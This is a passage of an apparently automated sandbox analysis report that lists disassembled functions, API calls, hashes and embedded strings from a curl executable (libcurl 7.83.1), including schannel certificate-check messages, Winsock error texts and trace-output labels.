                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_func_errnoioctlsocketstrerror
                                • String ID: %s%c%s$0Lu@Ru@/Mu$://$CURLOPT_BUFFERSIZE$CURLOPT_INTERLEAVEDATA$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_PROXY$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_TCP_FASTOPEN$CURLOPT_TCP_NODELAY$CURLOPT_URL$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XOAUTH2_BEARER$Ph'$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$V;J$VLI$V[J$ViI$VI$VJ$fcntl failed on fd=%d: %s$h+N$h,N$ht'$http://$https://$proxy support is disabled in this libcurl$k%$wJ
                                • API String ID: 1657940537-2175734073
                                • Opcode ID: c686e1f01f27ba0747a33f0bdb8f756f2ca0971145609aa3626b3387e8e2ccc8
                                • Instruction ID: ed3a60bf0fd2b5638b31c3ba65e21fbbae5c33ab638b09e82cff114c5da2d89d
                                • Opcode Fuzzy Hash: c686e1f01f27ba0747a33f0bdb8f756f2ca0971145609aa3626b3387e8e2ccc8
                                • Instruction Fuzzy Hash: 5311C671A049019FEF089BB0CD49BACBBA5FF4A314F154159E806E6292DB75DD41CE43
                                APIs
                                • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Host not found,000000FF,?,0087A10B), ref: 00879EF5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: strncpy
                                • String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
                                • API String ID: 3301158039-3442644082
                                • Opcode ID: 9e3b73f54ad3f13c80d26dd3221e951af1f3308146fdd23d4a1eb756761244cb
                                • Instruction ID: f196f559739361b6882671d526fc932b522a194eafe76c7b5988e388096d8671
                                • Opcode Fuzzy Hash: 9e3b73f54ad3f13c80d26dd3221e951af1f3308146fdd23d4a1eb756761244cb
                                • Instruction Fuzzy Hash: 8341665220C65896A338D19C5514A71B974FB06318B24C17EF6CFCA76CD0F3CE9BA362
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 008AE702
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AE766
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AEB75
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008AEBBD
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
                                • API String ID: 1294909896-2896079655
                                • Opcode ID: 03ff311d3f58bb99072bd142eab38ee6ab68199ac5d5025784a4c2ab99fbf921
                                • Instruction ID: bd6153ce39ecb53b9db7a7b6436eb29a5a913ef92d759491524fce1114dee6c5
                                • Opcode Fuzzy Hash: 03ff311d3f58bb99072bd142eab38ee6ab68199ac5d5025784a4c2ab99fbf921
                                • Instruction Fuzzy Hash: FEE117316087229BE724AB24D891A2FBBE5FF96720F14892DF945D3741EB74DC04CB92
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 0086688D
                                • ___from_strstr_to_strchr.LIBCMT ref: 008668A1
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 008668C1
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 008668F7
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0086691B
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0086697E
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00866988
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,008B8DD4), ref: 0086699E
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008669DA
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 008669E6
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(008B74AB), ref: 00866A30
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00866A7A
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00866A96
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00866AC9
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00866AD9
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(008B74AB), ref: 00866AF9
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B8DD4), ref: 00866B14
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00866B7F
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00866BD0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00866C50
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00866C58
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_func$_strdup$free$___from_strstr_to_strchrfclosefopenmalloc
                                • String ID: %.*s=%s$Couldn't read data from file "%s", this makes an empty POST.$f
                                • API String ID: 288693899-3884612863
                                • Opcode ID: a58d01ee745440dc162c19d49c168f27e9bf7c96d7c3d5ab59e548e269d202c7
                                • Instruction ID: 074045a0b1c00641b96883deadf418eb483a7be0501b8be945663597e14524b2
                                • Opcode Fuzzy Hash: a58d01ee745440dc162c19d49c168f27e9bf7c96d7c3d5ab59e548e269d202c7
                                • Instruction Fuzzy Hash: CBC1C2756087818FC7159F389894A6ABBE1FFC9328F194A1DF48AD7342EF31D8068715
                                APIs
                                • CertOpenStore.CRYPT32(00000002,00000000,00000000,00002000,00000000), ref: 008AF4D6
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008AF4E7
                                • CertCreateCertificateChainEngine.CRYPT32(?,?), ref: 008AF5D8
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008AF5E3
                                • CertGetCertificateChain.CRYPT32(?,?,00000000,?,00000010,00000000,00000000,?), ref: 008AF698
                                • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 008AF6A3
                                • CertFreeCertificateChainEngine.CRYPT32(00000000), ref: 008AF7C1
                                • CertCloseStore.CRYPT32(?,00000000), ref: 008AF7D4
                                • CertFreeCertificateChain.CRYPT32(00000000), ref: 008AF7E9
                                • CertFreeCertificateContext.CRYPT32(00000000), ref: 008AF7FE
                                Strings
                                • schannel: CertGetCertificateChain error mask: 0x%08x, xrefs: 008AF739
                                • schannel: Failed to read remote certificate context: %s, xrefs: 008AF7A4
                                • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 008AF4B8
                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 008AF71D
                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 008AF705
                                • schannel: CertGetCertificateChain failed: %s, xrefs: 008AF6B8
                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 008AF711
                                • schannel: failed to create certificate store: %s, xrefs: 008AF4FC
                                • schannel: failed to create certificate chain user: %s, xrefs: 008AF5F8
                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 008AF6F6
                                • (memory blob), xrefs: 008AF540
                                • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 008AF729
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Cert$Certificate$Chain$ErrorFreeLast$userStore$CloseContextCreateOpen
                                • String ID: (memory blob)$schannel: CertGetCertificateChain error mask: 0x%08x$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain user: %s$schannel: failed to create certificate store: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                                • API String ID: 713146188-3435997996
                                • Opcode ID: 4fc224a11384b06828b303f593a0f7a2389c4caf60ee81d85c2c4ef4a21133e5
                                • Instruction ID: e1703a90916f655b2b118ff54ee182dda8d62b22b39dd4fcd5aa5ac938796e08
                                • Opcode Fuzzy Hash: 4fc224a11384b06828b303f593a0f7a2389c4caf60ee81d85c2c4ef4a21133e5
                                • Instruction Fuzzy Hash: 14D1C130A00218DBEB258F64CC85BEA73B5FF4A310F1441B9EA19DB692D7749D81CF91
                                APIs
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A3177
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A31BB
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A31CC
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A31E0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A324F
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A3278
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A328B
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A329F
                                • ___from_strstr_to_strchr.LIBCMT ref: 008A32B3
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A3337
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: ___from_strstr_to_strchr$free
                                • String ID: /D:$/DEFINE:$/FIND:$/LOOKUP:$/M:$/MATCH:$CLIENT libcurl 7.83.1%sQUIT$CLIENT libcurl 7.83.1DEFINE %s %sQUIT$CLIENT libcurl 7.83.1MATCH %s %s %sQUIT$Failed sending DICT request$default$lookup word is missing
                                • API String ID: 3654317688-2903917456
                                • Opcode ID: 8874cc459890cb044ef12c658c91ceb1363ade284c096ac5ad522d2de32d8f93
                                • Instruction ID: ba74d1ffd7ecf8a60c919d147ecb610a8957b6e7d2716008e1970343c7553d9e
                                • Opcode Fuzzy Hash: 8874cc459890cb044ef12c658c91ceb1363ade284c096ac5ad522d2de32d8f93
                                • Instruction Fuzzy Hash: 26711A326087521AFB25562C5C16F2B7BD5FF93B60F28005DF885DB7C2EE61DE048292
                                APIs
                                • GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll,wine_get_version), ref: 008A463C
                                • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 008A4643
                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 008A47FA
                                • inet_pton.WS2_32(00000002,?,?), ref: 008A4823
                                • inet_pton.WS2_32(00000017,?,?), ref: 008A483C
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008A497C
                                Strings
                                • schannel: unable to allocate memory, xrefs: 008A498F
                                • ntdll, xrefs: 008A4637
                                • schannel: failed to send initial handshake data: sent %zd of %lu bytes, xrefs: 008A4B07
                                • Failed to set SNI, xrefs: 008A47E5
                                • ALPN: offers %s, xrefs: 008A485E
                                • schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc., xrefs: 008A461C
                                • http, xrefs: 008A4875
                                • /1.1, xrefs: 008A487F
                                • wine_get_version, xrefs: 008A4632
                                • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 008A4B1F
                                • http/1.1, xrefs: 008A4859
                                • schannel: using IP address, SNI is not supported by OS., xrefs: 008A4846
                                • schannel: SNI or certificate check failed: %s, xrefs: 008A4A52
                                • schannel: initial InitializeSecurityContext failed: %s, xrefs: 008A4A38, 008A4A6F
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: inet_pton$AddressHandleModuleProc_strdupcalloc
                                • String ID: /1.1$ALPN: offers %s$Failed to set SNI$http$http/1.1$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                • API String ID: 1589778587-246979986
                                • Opcode ID: 8c66c23bd337febef75ff50c4a93a1ce51a7667361b9666088220e1b5da97c15
                                • Instruction ID: 177551dbe2f4751a5a23d3d21a073806db0a95a00d3e78656950872407e862bf
                                • Opcode Fuzzy Hash: 8c66c23bd337febef75ff50c4a93a1ce51a7667361b9666088220e1b5da97c15
                                • Instruction Fuzzy Hash: F6F1DD30A042589FEF288F18DC85BE977B5FF86314F1441ADE849DA282DBB09D84CF52
                                APIs
                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0089FAC5
                                • WSACreateEvent.WS2_32 ref: 0089FB36
                                • WSAGetLastError.WS2_32 ref: 0089FB46
                                • WSAEventSelect.WS2_32(?,00000000,00000021), ref: 0089FB69
                                • WSACloseEvent.WS2_32(00000000), ref: 0089FB75
                                • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0089FB84
                                • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0089FB97
                                • WaitForMultipleObjects.API-MS-WIN-CORE-SYNCH-L1-2-1(00000001,?,00000000,00000064), ref: 0089FBD6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: Event$CloseCreateErrorFileHandleLastMultipleObjectsSelectTypeWaitcalloc
                                • String ID: $Time-out$WSACloseEvent failed (%d)$WSACreateEvent failed (%d)$WSAEnumNetworkEvents failed (%d)
                                • API String ID: 2419709179-2457143120
                                • Opcode ID: 92e28ad9aa1bfdffb148e8ca029b353e132128bb44d8047763fa14da86228e52
                                • Instruction ID: e2f4e99ad2f06fa41c9e8ac5fbd8f79dc8338719b0ade630ae31fda5c31bdc6a
                                • Opcode Fuzzy Hash: 92e28ad9aa1bfdffb148e8ca029b353e132128bb44d8047763fa14da86228e52
                                • Instruction Fuzzy Hash: 29B1A2715083009FDB18EF28C848BAA7BE5FF88714F18493DFA49DB292D771D8418B92
                                APIs
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 0086115C
                                  • Part of subcall function 0087027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,008610B6), ref: 0087028E
                                  • Part of subcall function 0087027A: __alldvrm.LIBCMT ref: 008702A7
                                  • Part of subcall function 0087027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008702D1
                                • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 008610C7
                                • _localtime64.API-MS-WIN-CRT-TIME-L1-1-0(?), ref: 00861116
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B6C58), ref: 0086117D
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 00861210
                                • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 00861221
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000001,?), ref: 008612D3
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,?), ref: 00861321
                                • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00861361
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: __acrt_iob_funcfwrite$CounterPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_localtime64_time64fopen
                                • String ID: %02d:%02d:%02d.%06ld $%s%s $%s== Info: %.*s$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$Failed to create/open output$[%zu bytes data]
                                • API String ID: 4066690675-628975109
                                • Opcode ID: 45472642705d4e00d8b937ef6c778d9390eee6edcbc0f7d2b71070b798ce7548
                                • Instruction ID: baf845aa2f2987571aa45db3b779240098251a4294f4a3e152b60e72ee59e4d7
                                • Opcode Fuzzy Hash: 45472642705d4e00d8b937ef6c778d9390eee6edcbc0f7d2b71070b798ce7548
                                • Instruction Fuzzy Hash: A6B1E171E002099FCF11CFA8CD49AEEBBB6FB0A304F194119E645E3752D779A841CBA4
                                APIs
                                • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sha256//,00000008), ref: 00887907
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887936
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887994
                                • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,008B8DD4), ref: 00887AA3
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000000,00000002), ref: 00887ABA
                                • ftell.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00887ACE
                                • fseek.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,00000000), ref: 00887ADF
                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887B16
                                • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00887B2E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887BB6
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00887BC8
                                • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 00887BCE
                                Strings
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free$fseekmalloc$fclosefopenfreadftellstrncmp
                                • String ID: public key hash: sha256//%s$;sha256//$sha256//
                                • API String ID: 477934247-1625489732
                                • Opcode ID: 517a4d1ad7afa97f5e93d3d8002f5b2e58b90d04318d7f559d7819e4c01bc39e
                                • Instruction ID: e9a79b6b87a3dabf6f4fc902a855d1b8b8035a45105cc70ffc59045704282e09
                                • Opcode Fuzzy Hash: 517a4d1ad7afa97f5e93d3d8002f5b2e58b90d04318d7f559d7819e4c01bc39e
                                • Instruction Fuzzy Hash: 9D91E432A04619EFDF15AF68DC04AAEBFB6FF45764F244069E805E7351EB719E008B90
                                APIs
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00868BF9), ref: 00881740
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00868BF9), ref: 00881765
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00868BF9), ref: 00881782
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00868BF9), ref: 008817A6
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008817CB
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008817F5
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088181D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881876
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881893
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008818B0
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008818EF
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088190C
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881929
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881946
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881963
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881980
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0088199D
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008819BA
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008819D7
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 008819F4
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881A11
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881A2E
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881A4B
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881A68
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881AE2
                                  • Part of subcall function 0087D126: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0087D13A
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00863167), ref: 00870E2C
                                  • Part of subcall function 00870E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00870E41
                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00881AB8
                                Memory Dump Source
                                • Source File: 0000000D.00000002.2189168882.0000000000861000.00000020.00000001.01000000.00000007.sdmp, Offset: 00860000, based on PE: true
                                • Associated: 0000000D.00000002.2189145513.0000000000860000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189263682.00000000008CF000.00000004.00000001.01000000.00000007.sdmpDownload File
                                • Associated: 0000000D.00000002.2189288243.00000000008D0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_13_2_860000_curl.jbxd
                                Similarity
                                • API ID: free
                                • String ID:
                                • API String ID: 1294909896-0
                                • Opcode ID: 6ac6863439105a72108ec18ee01ab292fea5a4c774de921c12250f8ecf163041
                                • Instruction ID: afe7e2b042802d95420812fc955c69c9688878265e52ea998db331e5c947497c
                                • Opcode Fuzzy Hash: 6ac6863439105a72108ec18ee01ab292fea5a4c774de921c12250f8ecf163041
                                • Instruction Fuzzy Hash: EEB10D31700A16EBDB09AF74EC546ACFBA6FF49710F14822AD51A93362CF7578109B91
                                Strings
                                • schannel: failed to decrypt data, need more data, xrefs: 008A5E6D
                                • schannel: server indicated shutdown in a prior call, xrefs: 008A5B4A
                                • schannel: SSL/TLS connection renegotiated, xrefs: 008A5E33
                                • schannel: unable to re-allocate memory, xrefs: 008A5BB8, 008A5EA1
